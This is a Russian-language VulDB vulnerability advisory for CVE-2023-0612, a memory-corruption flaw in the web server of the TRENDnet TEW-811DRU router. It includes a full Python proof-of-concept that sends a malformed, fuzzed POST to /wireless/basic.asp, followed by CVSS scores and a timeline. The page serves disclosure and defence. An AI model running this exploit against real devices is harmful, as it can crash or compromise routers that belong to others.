TRENDnet TEW-811DRU 1.0.10.0 httpd /wireless/basic.asp повреждение памяти

CVSS Meta Temp ScoreТекущая цена эксплуатации (≈)Балл интереса CTI
7.3$0-$5k0.05

Уязвимость была найдена в TRENDnet TEW-811DRU 1.0.10.0 и классифицирована как критический. Затронута неизвестная функция файла /wireless/basic.asp компонента httpd. Использование CWE для объявления проблемы приводит к тому, что CWE-120.

Эта уязвимость продается как CVE-2023-0612. Атаку можно осуществить удаленно. Имеются технические подробности. Популярность этой уязвимости ниже среднего. Более того, существует эксплойт. Эксплойт был раскрыт общественности и может быть использован. Текущая цена за эксплойт может составлять около USD $0-$5k в настоящее время.

Объявляется proof-of-concept. Эксплойт доступен для загрузки на сайте vuldb.com. В 0-дневный период предполагаемая подземная цена составляла около $0-$5k. Код, используемый эксплойтом, следующий:

import requests,socket
import re
import time
from urllib.parse import urlencode

device_web_ip = '192.168.10.1'

request = {'HEAD': {'Host': '{}'.format(device_web_ip), 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': b'applic?tiHHHHHHHHHHHHHHHHHHHcoded', 'Content-Length': '2365', 'Origin': 'http://0.0.0.0:8080', 'Connection': 'keep-alive', 'Referer': 'http://0.0.0.0:8080/wireless/basic.asp', 'Cookie': 'expandable=3c', 'Upgrade-Insecure-Requests': '1' }, 'PARAM': {'page': '/wireless/basic.asp', b'\xff\x99\xc3\x8a\x02\xff\x7f\L\xc3\x99\xc3': 'O9SAG0h7UFyvCrT4fVAX', b'wl_inpt': b'1', 'wl_bssid': 2, 'wl_bss_enabled': b'0\xc9\x8b\xc2\x8f', b'wl_\xef\x00\x14\x00\x01': 0, 'wl_ssid': 'dummy', b'l\x80cl\xff\xff\xff': 0, 'wl_chanspec': 40, b'wl_\x90l_\x90': 4, 'wl_wds0': '00:0c:29:d9:40:fe', b'll\x10': '00:0c:29:d9:40:ff', 'wl_wds2': '00:0c:29:d1:40:fe', b'q\xff\xffzwq\xff\xff': '00:0d:29:d9:40:fe', b'\x81\x80wwwwwww|wwwwwwwww': 0, b'wl\xff\xff\xff\x04\x00timeout': 1, b'\x00\x10\x7f\x89FF': 0, 'wl_country_code': b'\x00\x80', 'wl_country_rev': 27, 'wl_radio': b'\x1e', 'wl_nband': 1, 'wl_txchain': 3, 'wl_rxchain': b'3', 'wl_nmode_protection': 'auto', 'wl_vlan_prio_mode': b'Rl\x80\x80', 'wl_rate': 0, 'wl_rateset': b'h', 'wl_mrate': 0, 'wl_bcmdcs': 'off', 'wl_antdiv': -1, 'wl_reg_mode': 'off', 'wl_tpc_db': b'00', 'wl_obss_coex': b'1', 'wl_frag': 2346, 'wl_rts': b'3@', 'wl_dtim': b'\x7f', b'\x85\xff\x10\x05\xff': 100, 'wl_bcn_rotate': b'1', 'wl_maxassoc': 128, 'wl_frameburst': b'j\', 'wl_ampdu': b'V\x82', 'wl_rifs': b'~\x9boo', 'wl_rifs_advert': b'au\x7fo', 'wl_stbc_tx': b'\x03', 'wl_wme': b'nn', 'wl_wme_no_ack': b'\x10\x00\x9a', b'_w\xff\xff': 'on', 'wme_ap': b'(\x9e\x80', 'wl_wme_ap_be': 5, 'wl_wme_ap_be0': b'\x861', 'wl_wme_ap_be1': 63, 'wl_wme_ap_be2': 3, 'wl_wme_ap_be3': 0, 'wl_wme_ap_be4': 0, b'w\x05\xff\xff\x85e_a\x87_beD': 'off', 'wl_wme_ap_be6': b'\x9a', 'wl_wme_ap_bk': 5, 'wl_wme_ap_bk0': b'\xc3\xbc', b'wl_wm{_apZbk1': 1023, 'wl_wme_ap_bk2': 7, 'wl_wme_ap_bk3': b'008', 'wl_wme_ap_bk4': 0, 'wl_wme_ap_bk5': b'ofo', 'wl_wme_ap_bk6': b'\x80\x80\x00\xdb', 'wl_wme_ap_vi': 5, 'wl_wme_ap_vi0': 7, 'wl_wme_ap_vi1': b'1G\xc3G', b'wl_sLe_ap_vi\x80l_sLe_ap_vi2': 1, 'wl_wme_ap_vi3': 6016, 'wl_wme_ap_vi4': b'\x03\xe8d\xee\xad', 'wl_wme_ap_vi5': b'\xff\xff\x17', 'wl_wme_ap_vi6': 'off', b'wl[wmeIap_vo': 5, 'wl_wme_ap_vo0': 3, 'wl_wme_ap_vo1': b'\xc3\xae\xf5', 'wl_wme_ap_vo2': 1, 'wl_wme_ap_vo3': b'\xff\x05\xff\xff', 'wl_wme_ap_vo4': b'P', b'[lZwne_ap_vd5': b'\xc2\xbf\xc2\x92offf', 'wl_wme_ap_vo6': b'oLd', b'ws]\xc2\x90\xc2\x90Ke': b'x', 'wl_wme_sta_be': 5, 'wl_wme_sta_be0': 15, b'\xf1\x00\xff\x0f': 1023, 'wl_wme_sta_be2': 3, b'wl_w\x00\x00\x01\x00ta_b\x93\xe8': b'\x81_', b't\x81\x803t\x81a3': 0, 'wl_wme_sta_be5': b'oof', 'wl_wme_sta_be6': b'boff', 'wl_wme_sta_bk': 5, 'wl_wme_sta_bk0': 15, 'wl_wme_sta_bk1': 1023, 'wl_wme_sta_bk2': 7, b'w\x80\x81\xff\x85m_sta[bk3': b'\x7f', 'wl_wme_sta_bk4': 0, 'wl_wme_sta_bk5': b'd', 'wl_wme_sta_bk6': 'off', 'wl_wme_sta_vi': 5, b'wlTwulTwuekQ\x84': 7, 'wl_wme_sta_vi1': 15, 'wl_wme_sta_vi2': 2, 'wl_wme_sta_vi3': 6016, 'wl_wme_sta_vi4': 3008, 'wl_wme_sta_vi5': 'off', 'wl_wme_sta_vi6': 'off', 'wl_wme_sta_vo': 5, b'wP_wme_s\x00\x01\xff\xe7\x070': 3, 'wl_wme_sta_vo1': 7, b'\x81_7\x8f\x8f\x8f\x8f\x8f\x8f\x8f\x8f_vol__sta': 2, 'wl_wme_sta_vo3': b'\x80\x00\x80\x0164', b'wl_\x98me_sta_\x96o4': b'\xed\x00\x00\x00', 'wl_wme_sta_vo5': b'Qff', 'wl_wme_sta_vo6': 'off', 'wme_txp': 8, 'wl_wme_txp_be0': 7, b'\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02': b'\x90', 'wl_wme_txp_be2': 4, 'wl_wme_txp_be3': 2, 'wl_wme_txp_be4': 0, 'wl_wme_txp_bk': 5, 'wl_wme_txp_bk0': b'O', b'wmwme_txp\x85k1': 3, 'wl_wme_txp_bk2': 4, 'wl_wme_txp_bk3': 2, 'wl_wme_txp_bk4': 0, 'wl_wme_txp_vi': 5, 'wl_wme_txp_vi0': 7, 'wl_wme_txp_vi1': 3, 'wl_wme_txp_vi2': 4, 'wl_wme_txp_vi3': 2, 'wl_wme_txp_vi4': 0, 'wl_wme_txp_vo': 5, b'wl_w\x0b\x0b\n\x0bxp_vo0': 7, b't\x01': b'M', b'l_wme_me_txp_txp__tx': 4, 'wl_wme_txp_vo3': b':', 'wl_wme_txp_vo4': 0, 'wl_mode': 'ap', 'wl_ure': 0, 'wl_bridge': 0, 'wl_vlan_prio_mode__117_66oo': b'ome', b'/wipeless/basic.asp': b'', b'B\xc3\xa3\xc2\xa5': b'\x7f\xff\xff\xff', 'wan_summary_2_pppoe_username': '', 'mainform_submit': '', b'/tapppp.cgi': '', 'openheader': b'' }, 'ATTR': {'URL': 'http://{}/wireless/basic.asp'.format(device_web_ip), 'METHOD': 'POST', 'VERSION': 'HTTP/1.1' } }

headers = request['HEAD'] params = request['PARAM'] method = request['ATTR']['METHOD'] url = request['ATTR']['URL']

try: r = requests.request(method=method,url=url,headers=headers,data=urlencode(params),verify=False,timeout=5) except Exception as e: print('error:{}'.format(e))

ПродуктИнформация

Поставщик

Имя

Версия

Лицензия

CPE 2.3Информация

CPE 2.2Информация

CVSSv4Информация

VulDB CVSS-B Score: 🔍
VulDB CVSS-BT Score: 🔍
VulDB Вектор: 🔍
VulDB Надежность: 🔍

CVSSv3Информация

VulDB Meta Base Score: 7.5
VulDB Meta Temp Score: 7.3

VulDB Базовый балл: 7.5
VulDB Временная оценка: 6.8
VulDB Вектор: 🔍
VulDB Надежность: 🔍

NVD Базовый балл: 7.5
NVD Вектор: 🔍

CNA Базовый балл: 7.5
CNA Вектор (VulDB): 🔍

CVSSv2Информация

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
ВекторСложностьАутентификацияКонфиденциальностьЦелостностьДоступность
разблокироватьразблокироватьразблокироватьразблокироватьразблокироватьразблокировать
разблокироватьразблокироватьразблокироватьразблокироватьразблокироватьразблокировать
разблокироватьразблокироватьразблокироватьразблокироватьразблокироватьразблокировать

VulDB Базовый балл: 🔍
VulDB Временная оценка: 🔍
VulDB Надежность: 🔍

NVD Базовый балл: 🔍

ЭксплуатацияИнформация

Класс: повреждение памяти
CWE: CWE-120 / CWE-119
ATT&CK: Неизвестно

Локальный: Нет
Удаленный: Да

Доступность: 🔍
Доступ: публичный
Статус: Proof-of-Concept
Язык программирования: 🔍
Скачать: 🔍
Google Hack: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

Прогнозирование цены: 🔍
Оценка текущей цены: 🔍

0-Dayразблокироватьразблокироватьразблокироватьразблокировать
Сегодняразблокироватьразблокироватьразблокироватьразблокировать

Разведка угрозИнформация

Интерес: 🔍
Активные акторы: 🔍
Активные группы APT: 🔍

КонтрмерыИнформация

Рекомендуется: о смягчении не известно
Статус: 🔍

0-дневное время: 🔍

Временная шкалаИнформация

01.02.2023 🔍
01.02.2023 +0 дни 🔍
01.02.2023 +0 дни 🔍
01.03.2023 +28 дни 🔍

ИсточникиИнформация

Статус: Не определено

CVE: CVE-2023-0612 (🔍)
scip Labs: https://www.scip.ch/en/?labs.20161013

ВходИнформация

Создано: 01.02.2023 14:36
Обновлено: 01.03.2023 11:23
Изменения: 01.02.2023 14:36 (42), 01.02.2023 17:52 (1), 01.03.2023 11:16 (2), 01.03.2023 11:23 (27)
Завершить: 🔍
Отправитель: leetsun

SubmitИнформация

принято

  • Submit #76180: Web crash of TRENDnet router TEW-811DRU (по leetsun)

Обсуждение

Interested in the pricing of exploits?

See the underground prices here!